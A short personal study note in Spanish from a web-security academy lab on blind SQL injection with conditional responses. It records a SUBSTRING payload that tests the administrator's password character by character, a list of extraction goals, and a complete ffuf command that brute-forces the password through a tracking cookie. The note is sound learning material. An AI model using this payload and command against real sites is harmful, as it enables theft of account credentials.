---
tags:
  - sqli
---
### Teoría
*Conceptos nuevos*

### Lab
Continuando con _Bind SQL injection with conditional response_

**Voy a planificar mejor este lab porque es más difícil de lo que parece a primera vista**. Tengo este string `' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'),+1,+1) = 'b' --` que sé que comprueba de alguna forma carácter por carácter la contraseña del administrador.

**Objetivos**
1. Conseguir la versión de la bd
2. Conseguir las bd de la bd
3. Conseguir las tablas de la bd
4. Conseguir las columnas de las tablas
5. Conseguir la clave del administrador

*Para esto tendré que conseguir una forma más eficiente de recorrer y comprobar los caracteres del resultado.*


### Conclusiones
```sh
ffuf -w /home/alejandro/SecLists-master/Fuzzing/1-30.txt:W1 -w /home/alejandro/SecLists-master/Fuzzing/alphanum-case-extra.txt:W2 -u https://0ac300290319c87e801f717d0094000d.web-security-academy.net/filter\?category\=Accessories -b "TrackingId=WkIWXkn4TyEFPJca'+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username+%3d+'administrator'),W1,1)+=+'W2'+--+; session=CxA2qK8TOi8qqLEOmQyI4Ft8Wq5xmO91" -mc 200 -fs 5323 -o ~/Documentos/resultado.txt -v
```
### Apuntes creados

### Estado del proyecto
*Nada ha cambiado por hoy*